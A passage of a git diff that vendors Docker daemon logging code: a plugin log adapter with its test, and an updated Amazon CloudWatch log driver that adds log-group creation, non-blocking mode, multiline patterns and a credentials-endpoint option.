"github.com/docker/docker/daemon/logger/awslogs" _ "github.com/docker/docker/daemon/logger/etwlogs" _ "github.com/docker/docker/daemon/logger/fluentd" + _ "github.com/docker/docker/daemon/logger/gelf" _ "github.com/docker/docker/daemon/logger/jsonfilelog" _ "github.com/docker/docker/daemon/logger/logentries" _ "github.com/docker/docker/daemon/logger/splunk" diff --git a/vendor/github.com/docker/docker/daemon/logger/adapter.go b/vendor/github.com/docker/docker/daemon/logger/adapter.go new file mode 100644 index 0000000000..95aff9bf3b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/adapter.go @@ -0,0 +1,139 @@ +package logger // import "github.com/docker/docker/daemon/logger" + +import ( + "io" + "os" + "path/filepath" + "sync" + "time" + + "github.com/docker/docker/api/types/plugins/logdriver" + "github.com/docker/docker/pkg/plugingetter" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +// pluginAdapter takes a plugin and implements the Logger interface for logger +// instances +type pluginAdapter struct { + driverName string + id string + plugin logPlugin + fifoPath string + capabilities Capability + logInfo Info + + // synchronize access to the log stream and shared buffer + mu sync.Mutex + enc logdriver.LogEntryEncoder + stream io.WriteCloser + // buf is shared for each `Log()` call to reduce allocations. + // buf must be protected by mutex + buf logdriver.LogEntry +} + +func (a *pluginAdapter) Log(msg *Message) error { + a.mu.Lock() + + a.buf.Line = msg.Line + a.buf.TimeNano = msg.Timestamp.UnixNano() + a.buf.Partial = msg.PLogMetaData != nil + a.buf.Source = msg.Source + + err := a.enc.Encode(&a.buf) + a.buf.Reset() + + a.mu.Unlock() + + PutMessage(msg) + return err +} + +func (a *pluginAdapter) Name() string { + return a.driverName +} + +func (a *pluginAdapter) Close() error { + a.mu.Lock() + defer a.mu.Unlock() + + if err := a.plugin.StopLogging(filepath.Join("/", "run", "docker", "logging", a.id)); err != nil { + return err + } + + if err := a.stream.Close(); err != nil { + logrus.WithError(err).Error("error closing plugin fifo") + } + if err := os.Remove(a.fifoPath); err != nil && !os.IsNotExist(err) { + logrus.WithError(err).Error("error cleaning up plugin fifo") + } + + // may be nil, especially for unit tests + if pluginGetter != nil { + pluginGetter.Get(a.Name(), extName, plugingetter.Release) + } + return nil +} + +type pluginAdapterWithRead struct { + *pluginAdapter +} + +func (a *pluginAdapterWithRead) ReadLogs(config ReadConfig) *LogWatcher { + watcher := NewLogWatcher() + + go func() { + defer close(watcher.Msg) + stream, err := a.plugin.ReadLogs(a.logInfo, config) + if err != nil { + watcher.Err <- errors.Wrap(err, "error getting log reader") + return + } + defer stream.Close() + + dec := logdriver.NewLogEntryDecoder(stream) + for { + select { + case <-watcher.WatchClose(): + return + default: + } + + var buf logdriver.LogEntry + if err := dec.Decode(&buf); err != nil { + if err == io.EOF { + return + } + select { + case watcher.Err <- errors.Wrap(err, "error decoding log message"): + case <-watcher.WatchClose(): + } + return + } + + msg := &Message{ + Timestamp: time.Unix(0, buf.TimeNano), + Line: buf.Line, + Source: buf.Source, + } + + // plugin should handle this, but check just in case + if !config.Since.IsZero() && msg.Timestamp.Before(config.Since) { + continue + } + if !config.Until.IsZero() && msg.Timestamp.After(config.Until) { + return + } + + select { + case watcher.Msg <- msg: + case <-watcher.WatchClose(): + // make sure the message we consumed is sent + watcher.Msg <- msg + return + } + } + }() + + return watcher +} diff --git a/vendor/github.com/docker/docker/daemon/logger/adapter_test.go b/vendor/github.com/docker/docker/daemon/logger/adapter_test.go new file mode 100644 index 0000000000..f47e711c89 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/adapter_test.go @@ -0,0 +1,216 @@ +package logger // import "github.com/docker/docker/daemon/logger" + +import ( + "encoding/binary" + "io" + "sync" + "testing" + "time" + + "github.com/docker/docker/api/types/plugins/logdriver" + protoio "github.com/gogo/protobuf/io" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +// mockLoggingPlugin implements the loggingPlugin interface for testing purposes +// it only supports a single log stream +type mockLoggingPlugin struct { + io.WriteCloser + inStream io.Reader + logs []*logdriver.LogEntry + c *sync.Cond + err error +} + +func newMockLoggingPlugin() *mockLoggingPlugin { + r, w := io.Pipe() + return &mockLoggingPlugin{ + WriteCloser: w, + inStream: r, + logs: []*logdriver.LogEntry{}, + c: sync.NewCond(new(sync.Mutex)), + } +} + +func (l *mockLoggingPlugin) StartLogging(file string, info Info) error { + go func() { + dec := protoio.NewUint32DelimitedReader(l.inStream, binary.BigEndian, 1e6) + for { + var msg logdriver.LogEntry + if err := dec.ReadMsg(&msg); err != nil { + l.c.L.Lock() + if l.err == nil { + l.err = err + } + l.c.L.Unlock() + + l.c.Broadcast() + return + + } + + l.c.L.Lock() + l.logs = append(l.logs, &msg) + l.c.L.Unlock() + l.c.Broadcast() + } + + }() + return nil +} + +func (l *mockLoggingPlugin) StopLogging(file string) error { + l.c.L.Lock() + if l.err == nil { + l.err = io.EOF + } + l.c.L.Unlock() + l.c.Broadcast() + return nil +} + +func (l *mockLoggingPlugin) Capabilities() (cap Capability, err error) { + return Capability{ReadLogs: true}, nil +} + +func (l *mockLoggingPlugin) ReadLogs(info Info, config ReadConfig) (io.ReadCloser, error) { + r, w := io.Pipe() + + go func() { + var idx int + enc := logdriver.NewLogEntryEncoder(w) + + l.c.L.Lock() + defer l.c.L.Unlock() + for { + if l.err != nil { + w.Close() + return + } + + if idx >= len(l.logs) { + if !config.Follow { + w.Close() + return + } + + l.c.Wait() + continue + } + + if err := enc.Encode(l.logs[idx]); err != nil { + w.CloseWithError(err) + return + } + idx++ + } + }() + + return r, nil +} + +func (l *mockLoggingPlugin) waitLen(i int) { + l.c.L.Lock() + defer l.c.L.Unlock() + for len(l.logs) < i { + l.c.Wait() + } +} + +func (l *mockLoggingPlugin) check(t *testing.T) { + if l.err != nil && l.err != io.EOF { + t.Fatal(l.err) + } +} + +func newMockPluginAdapter(plugin *mockLoggingPlugin) Logger { + enc := logdriver.NewLogEntryEncoder(plugin) + a := &pluginAdapterWithRead{ + &pluginAdapter{ + plugin: plugin, + stream: plugin, + enc: enc, + }, + } + a.plugin.StartLogging("", Info{}) + return a +} + +func TestAdapterReadLogs(t *testing.T) { + plugin := newMockLoggingPlugin() + l := newMockPluginAdapter(plugin) + + testMsg := []Message{ + {Line: []byte("Are you the keymaker?"), Timestamp: time.Now()}, + {Line: []byte("Follow the white rabbit"), Timestamp: time.Now()}, + } + for _, msg := range testMsg { + m := msg.copy() + assert.Check(t, l.Log(m)) + } + + // Wait until messages are read into plugin + plugin.waitLen(len(testMsg)) + + lr, ok := l.(LogReader) + assert.Check(t, ok, "Logger does not implement LogReader") + + lw := lr.ReadLogs(ReadConfig{}) + + for _, x := range testMsg { + select { + case msg := <-lw.Msg: + testMessageEqual(t, &x, msg) + case <-time.After(10 * time.Second): + t.Fatal("timeout reading logs") + } + } + + select { + case _, ok := <-lw.Msg: + assert.Check(t, !ok, "expected message channel to be closed") + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for message channel to close") + + } + lw.Close() + + lw = lr.ReadLogs(ReadConfig{Follow: true}) + for _, x := range testMsg { + select { + case msg := <-lw.Msg: + testMessageEqual(t, &x, msg) + case <-time.After(10 * time.Second): + t.Fatal("timeout reading logs") + } + } + + x := Message{Line: []byte("Too infinity and beyond!"), Timestamp: time.Now()} + assert.Check(t, l.Log(x.copy())) + + select { + case msg, ok := <-lw.Msg: + assert.Check(t, ok, "message channel unexpectedly closed") + testMessageEqual(t, &x, msg) + case <-time.After(10 * time.Second): + t.Fatal("timeout reading logs") + } + + l.Close() + select { + case msg, ok := <-lw.Msg: + assert.Check(t, !ok, "expected message channel to be closed") + assert.Check(t, is.Nil(msg)) + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for logger to close") + } + + plugin.check(t) +} + +func testMessageEqual(t *testing.T, a, b *Message) { + assert.Check(t, is.DeepEqual(a.Line, b.Line)) + assert.Check(t, is.DeepEqual(a.Timestamp.UnixNano(), b.Timestamp.UnixNano())) + assert.Check(t, is.Equal(a.Source, b.Source)) +} diff --git a/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go index fee518db4b..3d6466f09d 100644 --- a/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go +++ b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go @@ -1,19 +1,20 @@ // Package awslogs provides the logdriver for forwarding container logs to Amazon CloudWatch Logs -package awslogs +package awslogs // import "github.com/docker/docker/daemon/logger/awslogs" import ( - "errors" "fmt" "os" + "regexp" "runtime" "sort" + "strconv" "strings" "sync" "time" - "github.com/Sirupsen/logrus" "github.com/aws/aws-sdk-go/aws" "github.com/aws/aws-sdk-go/aws/awserr" + "github.com/aws/aws-sdk-go/aws/credentials/endpointcreds" "github.com/aws/aws-sdk-go/aws/ec2metadata" "github.com/aws/aws-sdk-go/aws/request" "github.com/aws/aws-sdk-go/aws/session" @@ -21,16 +22,22 @@ import ( "github.com/docker/docker/daemon/logger" "github.com/docker/docker/daemon/logger/loggerutils" "github.com/docker/docker/dockerversion" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) const ( - name = "awslogs" - regionKey = "awslogs-region" - regionEnvKey = "AWS_REGION" - logGroupKey = "awslogs-group" - logStreamKey = "awslogs-stream" - tagKey = "tag" - batchPublishFrequency = 5 * time.Second + name = "awslogs" + regionKey = "awslogs-region" + regionEnvKey = "AWS_REGION" + logGroupKey = "awslogs-group" + logStreamKey = "awslogs-stream" + logCreateGroupKey = "awslogs-create-group" + tagKey = "tag" + datetimeFormatKey = "awslogs-datetime-format" + multilinePatternKey = "awslogs-multiline-pattern" + credentialsEndpointKey = "awslogs-credentials-endpoint" + batchPublishFrequency = 5 * time.Second // See: http://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutLogEvents.html perEventBytes = 26 @@ -43,21 +50,30 @@ const ( resourceAlreadyExistsCode = "ResourceAlreadyExistsException" dataAlreadyAcceptedCode = "DataAlreadyAcceptedException" invalidSequenceTokenCode = "InvalidSequenceTokenException" + resourceNotFoundCode = "ResourceNotFoundException" + + credentialsEndpoint = "http://169.254.170.2" userAgentHeader = "User-Agent" ) type logStream struct { - logStreamName string - logGroupName string - client api - messages chan *logger.Message - lock sync.RWMutex - closed bool - sequenceToken *string + logStreamName string + logGroupName string + logCreateGroup bool + logNonBlocking bool + multilinePattern *regexp.Regexp + client api + messages chan *logger.Message + lock sync.RWMutex + closed bool + sequenceToken *string } +var _ logger.SizedLogger = &logStream{} + type api interface { + CreateLogGroup(*cloudwatchlogs.CreateLogGroupInput) (*cloudwatchlogs.CreateLogGroupOutput, error) CreateLogStream(*cloudwatchlogs.CreateLogStreamInput) (*cloudwatchlogs.CreateLogStreamOutput, error) PutLogEvents(*cloudwatchlogs.PutLogEventsInput) (*cloudwatchlogs.PutLogEventsOutput, error) } @@ -82,58 +98,176 @@ func init() { } } +// eventBatch holds the events that are batched for submission and the +// associated data about it. +// +// Warning: this type is not threadsafe and must not be used +// concurrently. This type is expected to be consumed in a single go +// routine and never concurrently. +type eventBatch struct { + batch []wrappedEvent + bytes int +} + // New creates an awslogs logger using the configuration passed in on the // context. Supported context configuration variables are awslogs-region, -// awslogs-group, and awslogs-stream. When available, configuration is +// awslogs-group, awslogs-stream, awslogs-create-group, awslogs-multiline-pattern +// and awslogs-datetime-format. When available, configuration is // also taken from environment variables AWS_REGION, AWS_ACCESS_KEY_ID, // AWS_SECRET_ACCESS_KEY, the shared credentials file (~/.aws/credentials), and // the EC2 Instance Metadata Service. -func New(ctx logger.Context) (logger.Logger, error) { - logGroupName := ctx.Config[logGroupKey] - logStreamName, err := loggerutils.ParseLogTag(ctx, "{{.FullID}}") +func New(info logger.Info) (logger.Logger, error) { + logGroupName := info.Config[logGroupKey] + logStreamName, err := loggerutils.ParseLogTag(info, "{{.FullID}}") if err != nil { return nil, err } + logCreateGroup := false + if info.Config[logCreateGroupKey] != "" { + logCreateGroup, err = strconv.ParseBool(info.Config[logCreateGroupKey]) + if err != nil { + return nil, err + } + } - if ctx.Config[logStreamKey] != "" { - logStreamName = ctx.Config[logStreamKey] + logNonBlocking := info.Config["mode"] == "non-blocking" + + if info.Config[logStreamKey] != "" { + logStreamName = info.Config[logStreamKey] } - client, err := newAWSLogsClient(ctx) + + multilinePattern, err := parseMultilineOptions(info) if err != nil { return nil, err } - containerStream := &logStream{ - logStreamName: logStreamName, - logGroupName: logGroupName, - client: client, - messages: make(chan *logger.Message, 4096), - } - err = containerStream.create() + + client, err := newAWSLogsClient(info) if err != nil { return nil, err } - go containerStream.collectBatch() + + containerStream := &logStream{ + logStreamName: logStreamName, + logGroupName: logGroupName, + logCreateGroup: logCreateGroup, + logNonBlocking: logNonBlocking, + multilinePattern: multilinePattern, + client: client, + messages: make(chan *logger.Message, 4096), + } + + creationDone := make(chan bool) + if logNonBlocking { + go func() { + backoff := 1 + maxBackoff := 32 + for { + // If logger is closed we are done + containerStream.lock.RLock() + if containerStream.closed { + containerStream.lock.RUnlock() + break + } + containerStream.lock.RUnlock() + err := containerStream.create() + if err == nil { + break + } + + time.Sleep(time.Duration(backoff) * time.Second) + if backoff < maxBackoff { + backoff *= 2 + } + logrus. + WithError(err). + WithField("container-id", info.ContainerID). + WithField("container-name", info.ContainerName). + Error("Error while trying to initialize awslogs. Retrying in: ", backoff, " seconds") + } + close(creationDone) + }() + } else { + if err = containerStream.create(); err != nil { + return nil, err + } + close(creationDone) + } + go containerStream.collectBatch(creationDone) return containerStream, nil } +// Parses awslogs-multiline-pattern and awslogs-datetime-format options +// If awslogs-datetime-format is present, convert the format from strftime +// to regexp and return. +// If awslogs-multiline-pattern is present, compile regexp and return +func parseMultilineOptions(info logger.Info) (*regexp.Regexp, error) { + dateTimeFormat := info.Config[datetimeFormatKey] + multilinePatternKey := info.Config[multilinePatternKey] + // strftime input is parsed into a regular expression + if dateTimeFormat != "" { + // %. matches each strftime format sequence and ReplaceAllStringFunc + // looks up each format sequence in the conversion table strftimeToRegex + // to replace with a defined regular expression + r := regexp.MustCompile("%.") + multilinePatternKey = r.ReplaceAllStringFunc(dateTimeFormat, func(s string) string { + return strftimeToRegex[s] + }) + } + if multilinePatternKey != "" { + multilinePattern, err := regexp.Compile(multilinePatternKey) + if err != nil { + return nil, errors.Wrapf(err, "awslogs could not parse multiline pattern key %q", multilinePatternKey) + } + return multilinePattern, nil + } + return nil, nil +} + +// Maps strftime format strings to regex +var strftimeToRegex = map[string]string{ + /*weekdayShort */ `%a`: `(?:Mon|Tue|Wed|Thu|Fri|Sat|Sun)`, + /*weekdayFull */ `%A`: `(?:Monday|Tuesday|Wednesday|Thursday|Friday|Saturday|Sunday)`, + /*weekdayZeroIndex */ `%w`: `[0-6]`, + /*dayZeroPadded */ `%d`: `(?:0[1-9]|[1,2][0-9]|3[0,1])`, + /*monthShort */ `%b`: `(?:Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)`, + /*monthFull */ `%B`: `(?:January|February|March|April|May|June|July|August|September|October|November|December)`, + /*monthZeroPadded */ `%m`: `(?:0[1-9]|1[0-2])`, + /*yearCentury */ `%Y`: `\d{4}`, + /*yearZeroPadded */ `%y`: `\d{2}`, + /*hour24ZeroPadded */ `%H`: `(?:[0,1][0-9]|2[0-3])`, + /*hour12ZeroPadded */ `%I`: `(?:0[0-9]|1[0-2])`, + /*AM or PM */ `%p`: "[A,P]M", + /*minuteZeroPadded */ `%M`: `[0-5][0-9]`, + /*secondZeroPadded */ `%S`: `[0-5][0-9]`, + /*microsecondZeroPadded */ `%f`: `\d{6}`, + /*utcOffset */ `%z`: `[+-]\d{4}`, + /*tzName */ `%Z`: `[A-Z]{1,4}T`, + /*dayOfYearZeroPadded */ `%j`: `(?:0[0-9][1-9]|[1,2][0-9][0-9]|3[0-5][0-9]|36[0-6])`, + /*milliseconds */ `%L`: `\.\d{3}`, +} + // newRegionFinder is a variable such that the implementation // can be swapped out for unit tests. var newRegionFinder = func() regionFinder { return ec2metadata.New(session.New()) } +// newSDKEndpoint is a variable such that the implementation +// can be swapped out for unit tests. +var newSDKEndpoint = credentialsEndpoint + // newAWSLogsClient creates the service client for Amazon CloudWatch Logs. // Customizations to the default client from the SDK include a Docker-specific // User-Agent string and automatic region detection using the EC2 Instance // Metadata Service when region is otherwise unspecified. -func newAWSLogsClient(ctx logger.Context) (api, error) { +func newAWSLogsClient(info logger.Info) (api, error) { var region *string if os.Getenv(regionEnvKey) != "" { region = aws.String(os.Getenv(regionEnvKey)) } - if ctx.Config[regionKey] != "" { - region = aws.String(ctx.Config[regionKey]) + if info.Config[regionKey] != "" { + region = aws.String(info.Config[regionKey]) } if region == nil || *region == "" { logrus.Info("Trying to get region from EC2 Metadata") @@ -147,11 +281,33 @@ func newAWSLogsClient(ctx logger.Context) (api, error) { } region = &r } + + sess, err := session.NewSession() + if err != nil { + return nil, errors.New("Failed to create a service client session for for awslogs driver") + } + + // attach region to cloudwatchlogs config + sess.Config.Region = region + + if uri, ok := info.Config[credentialsEndpointKey]; ok { + logrus.Debugf("Trying to get credentials from awslogs-credentials-endpoint") + + endpoint := fmt.Sprintf("%s%s", newSDKEndpoint, uri) + creds := endpointcreds.NewCredentialsClient(*sess.Config, sess.Handlers, endpoint, + func(p *endpointcreds.Provider) { + p.ExpiryWindow = 5 * time.Minute + }) + + // attach credentials to cloudwatchlogs config + sess.Config.Credentials = creds + } + logrus.WithFields(logrus.Fields{ "region": *region, }).Debug("Created awslogs client") - client := cloudwatchlogs.New(session.New(), aws.NewConfig().WithRegion(*region)) + client := cloudwatchlogs.New(sess) client.Handlers.Build.PushBackNamed(request.NamedHandler{ Name: "DockerUserAgentHandler", @@ -170,14 +326,26 @@ func (l *logStream) Name() string { return name } +func (l *logStream) BufSize() int { + return maximumBytesPerEvent +} + // Log submits messages for logging by an instance of the awslogs logging driver func (l *logStream) Log(msg *logger.Message) error { l.lock.RLock() defer l.lock.RUnlock() - if !l.closed { - // buffer up the data, making sure to copy the Line data - l.messages <- logger.CopyMessage(msg) + if l.closed { + return errors.New("awslogs is closed") } + if l.logNonBlocking { + select { + case l.messages <- msg: + return nil + default: + return errors.New("awslogs buffer is full") + } + } + l.messages <- msg return nil } @@ -192,8 +360,52 @@ func (l *logStream) Close() error { return nil } -// create creates a log stream for the instance of the awslogs logging driver +// create creates log group and log stream for the instance of the awslogs logging driver func (l *logStream) create() error { + if err := l.createLogStream(); err != nil { + if l.logCreateGroup { + if awsErr, ok := err.(awserr.Error); ok && awsErr.Code() == resourceNotFoundCode { + if err := l.createLogGroup(); err != nil { + return err + } + return l.createLogStream() + } + } + if err != nil { + return err + } + } + + return nil +} + +// createLogGroup creates a log group for the instance of the awslogs logging driver +func (l *logStream) createLogGroup() error { + if _, err := l.client.CreateLogGroup(&cloudwatchlogs.CreateLogGroupInput{ + LogGroupName: aws.String(l.logGroupName), + }); err != nil { + if awsErr, ok := err.(awserr.Error); ok { + fields := logrus.Fields{ + "errorCode": awsErr.Code(), + "message": awsErr.Message(), + "origError": awsErr.OrigErr(), + "logGroupName": l.logGroupName, + "logCreateGroup": l.logCreateGroup, + } + if awsErr.Code() == resourceAlreadyExistsCode { + // Allow creation to succeed + logrus.WithFields(fields).Info("Log group already exists") + return nil + } + logrus.WithFields(fields).Error("Failed to create log group") + } + return err + } + return nil +} + +// createLogStream creates a log stream for the instance of the awslogs logging driver +func (l *logStream) createLogStream() error { input := &cloudwatchlogs.CreateLogStreamInput{ LogGroupName: aws.String(l.logGroupName), LogStreamName: aws.String(l.logStreamName), @@ -228,71 +440,117 @@ var newTicker = func(freq time.Duration) *time.Ticker { } // collectBatch executes as a goroutine to perform batching of log events for -// submission to the log stream. Batching is performed on time- and size- -// bases. Time-based batching occurs at a 5 second interval (defined in the -// batchPublishFrequency const). Size-based batching is performed on the -// maximum number of events per batch (defined in maximumLogEventsPerPut) and -// the maximum number of total bytes in a batch (defined in -// maximumBytesPerPut). Log messages are split by the maximum bytes per event -// (defined in maximumBytesPerEvent). There is a fixed per-event byte overhead -// (defined in perEventBytes) which is accounted for in split- and batch- -// calculations. -func (l *logStream) collectBatch() { - timer := newTicker(batchPublishFrequency) - var events []wrappedEvent - bytes := 0 +// submission to the log stream. If the awslogs-multiline-pattern or +// awslogs-datetime-format options have been configured, multiline processing +// is enabled, where log messages are stored in an event buffer until a multiline +// pattern match is found, at which point the messages in the event buffer are +// pushed to CloudWatch logs as a single log event. Multiline messages are processed +// according to the maximumBytesPerPut constraint, and the implementation only +// allows for messages to be buffered for a maximum of 2*batchPublishFrequency +// seconds. When events are ready to be processed for submission to CloudWatch +// Logs, the processEvents method is called. If a multiline pattern is not +// configured, log events are submitted to the processEvents method immediately. +func (l *logStream) collectBatch(created chan bool) { + // Wait for the logstream/group to be created + <-created + ticker := newTicker(batchPublishFrequency) + var eventBuffer []byte + var eventBufferTimestamp int64 + var batch = newEventBatch() for { select { - case <-timer.C: - l.publishBatch(events) - events = events[:0] - bytes = 0 + case t := <-ticker.C: + // If event buffer is older than batch publish frequency flush the event buffer + if eventBufferTimestamp > 0 && len(eventBuffer) > 0 { + eventBufferAge := t.UnixNano()/int64(time.Millisecond) - eventBufferTimestamp + eventBufferExpired := eventBufferAge >= int64(batchPublishFrequency)/int64(time.Millisecond) + eventBufferNegative := eventBufferAge < 0 + if eventBufferExpired || eventBufferNegative { + l.processEvent(batch, eventBuffer, eventBufferTimestamp) + eventBuffer = eventBuffer[:0] + } + } + l.publishBatch(batch) + batch.reset() case msg, more := <-l.messages: if !more { - l.publishBatch(events) + // Flush event buffer and release resources + l.processEvent(batch, eventBuffer, eventBufferTimestamp) + eventBuffer = eventBuffer[:0] + l.publishBatch(batch) + batch.reset() return } - unprocessedLine := msg.Line - for len(unprocessedLine) > 0 { - // Split line length so it does not exceed the maximum - lineBytes := len(unprocessedLine) - if lineBytes > maximumBytesPerEvent { - lineBytes = maximumBytesPerEvent + if eventBufferTimestamp == 0 { + eventBufferTimestamp = msg.Timestamp.UnixNano() / int64(time.Millisecond) + } + line := msg.Line + if l.multilinePattern != nil { + if l.multilinePattern.Match(line) || len(eventBuffer)+len(line) > maximumBytesPerEvent { + // This is a new log event or we will exceed max bytes per event + // so flush the current eventBuffer to events and reset timestamp + l.processEvent(batch, eventBuffer, eventBufferTimestamp) + eventBufferTimestamp = msg.Timestamp.UnixNano() / int64(time.Millisecond) + eventBuffer = eventBuffer[:0] } - line := unprocessedLine[:lineBytes] - unprocessedLine = unprocessedLine[lineBytes:] - if (len(events) >= maximumLogEventsPerPut) || (bytes+lineBytes+perEventBytes > maximumBytesPerPut) { - // Publish an existing batch if it's already over the maximum number of events or if adding this - // event would push it over the maximum number of total bytes. - l.publishBatch(events) - events = events[:0] - bytes = 0 + // Append new line if event is less than max event size + if len(line) < maximumBytesPerEvent { + line = append(line, "\n"...) } - events = append(events, wrappedEvent{ - inputLogEvent: &cloudwatchlogs.InputLogEvent{ - Message: aws.String(string(line)), - Timestamp: aws.Int64(msg.Timestamp.UnixNano() / int64(time.Millisecond)), - }, - insertOrder: len(events), - }) - bytes += (lineBytes + perEventBytes) + eventBuffer = append(eventBuffer, line...) + logger.PutMessage(msg) + } else { + l.processEvent(batch, line, msg.Timestamp.UnixNano()/int64(time.Millisecond)) + logger.PutMessage(msg) } } } } +// processEvent processes log events that are ready for submission to CloudWatch +// logs. Batching is performed on time- and size-bases. Time-based batching +// occurs at a 5 second interval (defined in the batchPublishFrequency const). +// Size-based batching is performed on the maximum number of events per batch +// (defined in maximumLogEventsPerPut) and the maximum number of total bytes in a +// batch (defined in maximumBytesPerPut). Log messages are split by the maximum +// bytes per event (defined in maximumBytesPerEvent). There is a fixed per-event +// byte overhead (defined in perEventBytes) which is accounted for in split- and +// batch-calculations. +func (l *logStream) processEvent(batch *eventBatch, events []byte, timestamp int64) { + for len(events) > 0 { + // Split line length so it does not exceed the maximum + lineBytes := len(events) + if lineBytes > maximumBytesPerEvent { + lineBytes = maximumBytesPerEvent + } + line := events[:lineBytes] + + event := wrappedEvent{ + inputLogEvent: &cloudwatchlogs.InputLogEvent{ + Message: aws.String(string(line)), + Timestamp: aws.Int64(timestamp), + }, + insertOrder: batch.count(), + } + + added := batch.add(event, lineBytes) + if added { + events = events[lineBytes:] + } else { + l.publishBatch(batch) + batch.reset() + } + } +} + // publishBatch calls PutLogEvents for a given set of InputLogEvents, // accounting for sequencing requirements (each request must reference the // sequence token returned by the previous request). -func (l *logStream) publishBatch(events []wrappedEvent) { - if len(events) == 0 { +func (l *logStream) publishBatch(batch *eventBatch) { + if batch.isEmpty() { return } - - // events in a batch must be sorted by timestamp - // see http://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutLogEvents.html - sort.Sort(byTimestamp(events)) - cwEvents := unwrapEvents(events) + cwEvents := unwrapEvents(batch.events()) nextSequenceToken, err := l.putLogEvents(cwEvents, l.sequenceToken) @@ -349,14 +607,19 @@ func (l *logStream) putLogEvents(events []*cloudwatchlogs.InputLogEvent, sequenc } // ValidateLogOpt looks for awslogs-specific log options awslogs-region, -// awslogs-group, and awslogs-stream +// awslogs-group, awslogs-stream, awslogs-create-group, awslogs-datetime-format, +// awslogs-multiline-pattern func ValidateLogOpt(cfg map[string]string) error { for key := range cfg { switch key { case logGroupKey: case logStreamKey: + case logCreateGroupKey: case regionKey: case tagKey: + case datetimeFormatKey: + case multilinePatternKey: + case credentialsEndpointKey: default: return fmt.Errorf("unknown log opt '%s' for %s log driver", key, name) } @@ -364,6 +627,16 @@ func ValidateLogOpt(cfg map[string]string) error { if cfg[logGroupKey] == "" { return fmt.Errorf("must specify a value for log opt '%s'", logGroupKey) } + if cfg[logCreateGroupKey] != "" { + if _, err := strconv.ParseBool(cfg[logCreateGroupKey]); err != nil { + return fmt.Errorf("must specify valid value for log opt '%s': %v", logCreateGroupKey, err) + } + } + _, datetimeFormatKeyExists := cfg[datetimeFormatKey] + _, multilinePatternKeyExists := cfg[multilinePatternKey] + if datetimeFormatKeyExists && multilinePatternKeyExists { + return fmt.Errorf("you cannot configure log opt '%s' and '%s' at the same time", datetimeFormatKey, multilinePatternKey) + } return nil } @@ -396,9 +669,76 @@ func (slice byTimestamp) Swap(i, j int) { } func unwrapEvents(events []wrappedEvent) []*cloudwatchlogs.InputLogEvent { - cwEvents := []*cloudwatchlogs.InputLogEvent{} - for _, input := range events { - cwEvents = append(cwEvents, input.inputLogEvent) + cwEvents := make([]*cloudwatchlogs.InputLogEvent, len(events)) + for i, input := range events { + cwEvents[i] = input.inputLogEvent } return cwEvents } + +func newEventBatch() *eventBatch { + return &eventBatch{ + batch: make([]wrappedEvent, 0), + bytes: 0, + } +} + +// events returns a slice of wrappedEvents sorted in order of their +// timestamps and then by their insertion order (see `byTimestamp`). +// +// Warning: this method is not threadsafe and must not be used +// concurrently. +func (b *eventBatch) events() []wrappedEvent { + sort.Sort(byTimestamp(b.batch)) + return b.batch +} + +// add adds an event to the batch of events accounting for the +// necessary overhead for an event to be logged. An error will be +// returned if the event cannot be added to the batch due to service +// limits. +// +// Warning: this method is not threadsafe and must not be used +// concurrently. +func (b *eventBatch) add(event wrappedEvent, size int) bool { + addBytes := size + perEventBytes + + // verify we are still within service limits + switch { + case len(b.batch)+1 > maximumLogEventsPerPut: + return false + case b.bytes+addBytes > maximumBytesPerPut: + return false + } + + b.bytes += addBytes + b.batch = append(b.batch, event) + + return true +} + +// count is the number of batched events. Warning: this method +// is not threadsafe and must not be used concurrently. +func (b *eventBatch) count() int { + return len(b.batch) +} + +// size is the total number of bytes that the batch represents. +// +// Warning: this method is not threadsafe and must not be used +// concurrently. +func (b *eventBatch) size() int { + return b.bytes +} + +func (b *eventBatch) isEmpty() bool { + zeroEvents := b.count() == 0 + zeroSize := b.size() == 0 + return zeroEvents && zeroSize +} + +// reset prepares the batch for reuse. +func (b *eventBatch) reset() { + b.bytes = 0 + b.batch = b.batch[:0] +} diff --git a/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go index d5b1aaef52..6955d910c3 100644 --- a/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go @@ -1,10 +1,14 @@ -package awslogs +package awslogs // import "github.com/docker/docker/daemon/logger/awslogs" import ( "errors" "fmt" + "io/ioutil" "net/http" + "net/http/httptest" + "os" "reflect" + "regexp" "runtime" "strings" "testing" @@ -17,6 +21,8 @@ import ( "github.com/docker/docker/daemon/logger" "github.com/docker/docker/daemon/logger/loggerutils" "github.com/docker/docker/dockerversion" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) const ( @@ -24,17 +30,43 @@ const ( streamName = "streamName" sequenceToken = "sequenceToken" nextSequenceToken = "nextSequenceToken" - logline = "this is a log line" + logline = "this is a log line\r" + multilineLogline = "2017-01-01 01:01:44 This is a multiline log entry\r" ) +// Generates i multi-line events each with j lines +func (l *logStream) logGenerator(lineCount int, multilineCount int) { + for i := 0; i < multilineCount; i++ { + l.Log(&logger.Message{ + Line: []byte(multilineLogline), + Timestamp: time.Time{}, + }) + for j := 0; j < lineCount; j++ { + l.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Time{}, + }) + } + } +} + +func testEventBatch(events []wrappedEvent) *eventBatch { + batch := newEventBatch() + for _, event := range events { + eventlen := len([]byte(*event.inputLogEvent.Message)) + batch.add(event, eventlen) + } + return batch +} + func TestNewAWSLogsClientUserAgentHandler(t *testing.T) { - ctx := logger.Context{ + info := 